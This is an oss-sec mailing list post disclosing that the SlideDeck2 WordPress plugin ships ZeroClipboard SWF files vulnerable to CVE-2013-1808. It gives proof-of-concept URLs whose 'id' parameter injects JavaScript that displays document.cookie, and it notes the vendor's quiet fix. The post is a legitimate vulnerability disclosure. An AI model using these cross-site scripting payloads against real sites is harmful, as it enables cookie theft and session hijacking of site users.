oss-sec mailing list archives
Re: WordPress plugins vulnerable to CVE-2013-1808
From: Henri Salo <henri () nerv fi>
Date: Thu, 14 Mar 2013 11:06:20 +0200
On Sun, Mar 10, 2013 at 10:52:07AM +0200, Henri Salo wrote:
Plugin: slidedeck2 Version: 2.1.20130306 Affected file: http://plugins.svn.wordpress.org/slidedeck2/trunk/js/zeroclipboard/ZeroClipboard.swf 406ca1ec9595fd96424e6c8f3802bc898f080116 PoC: wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height Affected file: http://plugins.svn.wordpress.org/slidedeck2/trunk/js/zeroclipboard/ZeroClipboard10.swf 1ea0fc0cea30a7d912c2564d51204a816f1e58be PoC: wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
This has been fixed in 2.1.20130306 version. Changelog http://wordpress.org/extend/plugins/slidedeck2/changelog/ says: 2.1.20130306 Security improvements Again no CVE added to changelog and reporter (me) not notified about fixes done. -- Henri Salo
Attachment:
signature.asc
Description: Digital signature
Current thread:
- WordPress plugins vulnerable to CVE-2013-1808 Henri Salo (Mar 10)
- Re: WordPress plugins vulnerable to CVE-2013-1808 Henri Salo (Mar 14)
- Re: WordPress plugins vulnerable to CVE-2013-1808 Henri Salo (Mar 26)
- RE: WordPress plugins vulnerable to CVE-2013-1808 Christey, Steven M. (Mar 28)